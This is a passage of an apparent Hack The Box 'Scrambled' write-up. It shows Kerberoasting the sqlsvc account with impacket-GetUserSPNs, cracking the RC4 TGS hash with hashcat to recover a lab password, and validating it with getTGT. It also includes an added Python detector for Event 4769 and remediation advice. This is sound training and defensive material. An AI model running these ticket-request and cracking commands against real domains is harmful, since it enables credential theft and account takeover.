Kerberoasting
During the BloodHound enumeration, the sqlsvc account was identified as vulnerable to Kerberoasting.
Kerberoasting is an attack in which an adversary targets service tickets granted by the Key Distribution Center (KDC) in a Kerberos authentication system. The attacker requests service tickets for specific service accounts and attempts to crack the encrypted Ticket Granting Service (TGS) tickets offline, seeking to obtain plaintext credentials. The attack works because the service ticket is encrypted with a key derived from the service account's password: a weak password, especially under the legacy RC4 encryption type (etype 23) seen below, can be recovered offline with no further contact with the KDC, allowing the adversary to compromise the account.
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ KRB5CCNAME=ksimpson@dc1.scrm.local.ccache impacket-GetUserSPNs scrm.local/ksimpson@dc1.scrm.local -no-pass -k -dc-ip $IP -dc-host dc1.scrm.local -request-user sqlsvc
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
mssqlsvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 17:32:02.351452 2023-11-20 09:43:04.998096
mssqlsvc/dc1.scrm.local sqlsvc 2021-11-03 17:32:02.351452 2023-11-20 09:43:04.998096
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$f241d37dcf397bd8f2b8b20c5ee4060e$...
Using the TGT of the ksimpson user, I am able to authenticate to the target KDC and Kerberoast the sqlsvc account, effectively extracting the TGS hash.
The SPNs in the output match:
mssqlsvc/dc1.scrm.local:1433
MSSQLSvc/dc1.scrm.local
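From the defender's side, the request above leaves a Windows Security Event 4769 on the DC: a user principal asking for an RC4 (etype 0x17) service ticket for a non-machine service account. The following is an added example, not part of the original writeup, that runs that check over constructed 4769 records; the field names follow the 4769 event schema and the sample values (principals, IPs) are made up to mirror this box.

```python
"""Detect likely Kerberoasting in Windows Security Event 4769 records.

Assumes 'Audit Kerberos Service Ticket Operations' is enabled on the DC so
that 4769 is logged. A single RC4 TGS request for a user-account SPN is
already notable in a domain where AES is the norm; grouping by requester
and source IP surfaces bulk requests (GetUserSPNs without -request-user).
"""
from collections import defaultdict

# Constructed sample records (not real logs); first one mirrors the
# GetUserSPNs -request-user sqlsvc call made above as ksimpson.
EVENTS = [
    {"TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "ksimpson@SCRM.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"TargetUserName": "DC1$@SCRM.LOCAL", "ServiceName": "DC1$",
     "TicketEncryptionType": "0x12", "IpAddress": "::1", "Status": "0x0"},
    {"TargetUserName": "jdoe@SCRM.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.9", "Status": "0x0"},
]

# 0x17 = RC4-HMAC (hashcat mode 13100), 0x18 = RC4-HMAC-EXP. Both derive
# the ticket key from the unsalted NT hash of the account password.
RC4_ETYPES = {"0x17", "0x18"}


def is_roast_candidate(ev):
    """True when a 4769 looks like a Kerberoast ticket request."""
    svc = ev["ServiceName"]
    return (ev["Status"] == "0x0"                       # ticket was issued
            and ev["TicketEncryptionType"].lower() in RC4_ETYPES
            and svc.lower() != "krbtgt"                # TGT renewals are noise
            and not svc.endswith("$"))                 # machine accounts have random passwords


def kerberoast_report(events):
    """Map (requesting principal, source IP) -> sorted list of roasted services."""
    report = defaultdict(set)
    for ev in events:
        if is_roast_candidate(ev):
            report[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(services) for key, services in report.items()}


if __name__ == "__main__":
    for (who, src), services in kerberoast_report(EVENTS).items():
        print(f"{who} from {src} requested RC4 tickets for: {', '.join(services)}")
```

The lasting fix is on the account side: a long random password or a gMSA for sqlsvc, and AES-only encryption types so that etype 23 tickets are never issued.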
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ hashcat --show sqlsvc.hash
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ hashcat -a 0 -m 13100 sqlsvc.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$f241d37dcf397bd8f2b8b20c5ee4060e$3028d1d3ee2c7fd5363f9752302743d87a75f3f2009630743c298d7a67bf315decaafeb74ee08322c697f8f954d5f2a3b9a8b74e67ed78854b6ae4f435c36c5c7c2294d2b8c686883e1ad9b836c2de80863d3fb74341458b14f90acc6a8b17a1a5c8eee74d3dc4ce8be27c22be14f68055f832e416f357ace74bc7cd061a0b9ee9dacbfe046583762346cf2a632352253a2ce26bbbb74590f4318815d81117e6a03348bb036d557e9f26da54bf8ea853696990b7acddafe43e0f7ee0b4cfa9a53257a452c9f437c6e8040b32069a6a62001ae6057815d3b098e4a93615185550a75da6040f2e7e072bb00fc8c2301127baa704cd60c2f9b8b4138d75eceec7287a5dcd92ba139306e4018aaed95ebc54e7e6c8d0be627c14c1cd66ea68f957ed2d7ad3fd29fffe841b6ee28d1a2329f88798f8c694b61b6f4f80b5567db7ef662118aba9bc1a38434b7ad60b604066dfb686ee092a2bc057c309bca865e49683471f6b9c0b0ed1ca023890bd801e0567a08f8feb466231622f43ca98cc8f4000e38c5a0f30e6be6e521b0087657655e2d2fd002cc165b51637bb3cff8023b9a8a63b2b36079bcdc05edd2eabf3fec6567dff3ec0e0ee143b68cb7a76a7c3de28c25bd710bc76eb9d2a5f75ae7f9c17de3d24dbb9cad2313588a643701421ca5e7799b98d6d522d46c028b5464e79f1aea8d8f6a65f4041611ca9bb009bc373efff75ce49c98b0a54173d83631cbaece9cc2ea92b65ccef29e2f15a51cfbc9ce2468b7703f3ac1b67a4719facade46a65da793075d9c5abba218e4d8dcbdfc6760ef2d99d43dca37a8319df932cdd77b63662984403772c65ddcb70f337a63cb06ea1e030dd3d2931ee98ce3d4f2e955e4553cd241bfa31a5762b682f59962c00134828d43522ec0a31089a7f50fb89755d110e9954f890d2e834843e40abd1deec8407670cb9617b9dafc802b427b664dde7c9db2c18caccbf92f72fcf949a92c295912f1d1fc31ebcfe283b1f98cab9a674f032373db2e0bebe683b5c215d22e32f242176ee5a1d9aa883bb05e77514d8f47892168a335d6cb6e9def1d3d5e770c6b0be86bf912b22cf3f5c59a5bb200f0a1f49fb537219c561ce53bb19bbd660c7e8a49d078535d65b9e88f0131547db8ffcede3b0ba1a0ac3328504a12ceb6dfe6ebfa2db1ccc53a20e667e842ee3c0ab5e9616844a453a1d8044edcc2a5f7c7946288e9315e9dd9aa52cb604f60a925510c8756fd663e0d3cb76dfdac6f5e58789570824b7c9a799c04f5cfdf26b47ff0fa1bf56c93a8013189b0e14f45e892a91ce2d45eb221a2722d962ec59814bc7edec6bc75d825853a98904d78
335089aa239952bda7d7296b906066de8c39713114c1a6a5348b343820a27401ad0ea0bbdb10c1b73ec71ff15e8c4491de3cdd62d4b91b0580309099e:Pegasus60
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$f...09099e
Time.Started.....: Mon Nov 20 09:52:33 2023 (6 secs)
Time.Estimated...: Mon Nov 20 09:52:39 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2000.7 kH/s (0.85ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10730496/14344386 (74.81%)
Rejected.........: 0/10730496 (0.00%)
Restore.Point....: 10727424/14344386 (74.78%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Petey7840 -> Paulisdead
Hardware.Mon.#1..: Util: 62%
Started: Mon Nov 20 09:52:33 2023
Stopped: Mon Nov 20 09:52:40 2023
hashcat cracked the TGS ticket. The cracked password is Pegasus60.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ impacket-getTGT scrm.local/sqlsvc@dc1.scrm.local -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
password: Pegasus60
[*] Saving ticket in sqlsvc@dc1.scrm.local.ccache
Validated: a TGT is generated for the sqlsvc account.